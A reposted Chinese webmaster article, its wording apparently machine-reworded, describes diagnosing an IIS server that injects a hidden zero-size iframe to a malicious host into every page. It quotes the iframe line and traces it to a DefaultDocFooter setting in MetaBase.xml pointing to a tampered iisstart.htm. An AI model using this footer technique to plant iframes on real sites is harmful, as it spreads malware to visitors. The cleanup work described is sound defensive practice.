Windows处事器下查IIS被挂iframe木马
发布时间:2018-08-21 08:16:04 所属栏目:编程 来源:站长网
导读:一台处事器 险些全部网站打开网页 乃至HTML网页 都呈现了 iframe src=http://xxxdfsfd/web.htm height=0 width=0/iframe 这种样式的代码 有的在头部 有的在尾部 部门 杀毒软件 打开会报毒 打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码 说明缘故起因 首
|
一台处事器 险些全部网站打开网页 乃至HTML网页 都呈现了 <iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe> 这种样式的代码 有的在头部 有的在尾部 部门杀毒软件打开会报毒 打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码 说明缘故起因 起首猜疑ARP挂马,用防ARP的器材又没有发明有arp诱骗 并且arp诱骗一样平常不会每次都被插入代码,而是时偶然无 并且行使http://127.0.0.1 可能http://localhost 会见的时辰也可以找到这段代码 arp诱骗的也许解除。 然后就想到也许是JS被改动,可能是其余的包括文件,查找后没有发明被改的页面 连新建的HTML页面赏识的时辰也会被插入这段代码,那就只能是通过IIS挂上去的了。 备份iis数据然后重装iis,代码消散,将备份的iis规复,题目又来了。 细心探求,题目应该出在IIS的设置文件上,打开设置文件,没有发明那段代码。 那很有也许是挪用了某个文件,这个怎么查啊,突然想起了台甫鼎鼎的Filemon 当地载了一个上传随处事器上,打开Filemon,数据太多了,过滤掉一些没有效的 只留下iis的历程,数据照旧许多,看来处事器上的站点照旧挺多人在会见的。 关掉全部站点,建了一个测试站点anky 目次为D:www 在下面建了一个空缺页面test.htm 会见一下这个页面代码被插进来了,再看一下Filemon 稀疏怎么读取C:Inetpubwwwrootiisstart.htm 打开C:Inetpubwwwrootiisstart.htm一看,内里就躺着 <iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe> 把代码删除了留空,会见test.htm 正常了,把C:Inetpubwwwrootiisstart.htm删除了再见见 test.htm 呈现 “读取数据页脚文件堕落”题目就出这里了,看来是挪用了 这个文件。 把C:Inetpubwwwrootiisstart.htm清空就正常了,这样怎么行,办理题目虽然要连根拔掉。 continue 有没有也许是扩展造成的,到扩展中搜查了一遍所有都是正常的 虽然 通过ISAPI 挂马的也是存在的 左想右想最后照旧认为设置文件有题目 打开设置文件,设置文件在%windir%system32inetsrvMetaBase.xml 用记事本打开,查找iisstart.htm 找到一行,开始觉得是默认站点,其后一想差池啊 默认站点都删除了,再细心一看这句代码为 DefaultDocFooter="FILE:C:Inetpubwwwrootiisstart.htm" 删除去这一行,题目彻底办理了。 (编辑:湖南网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
站长推荐
热点阅读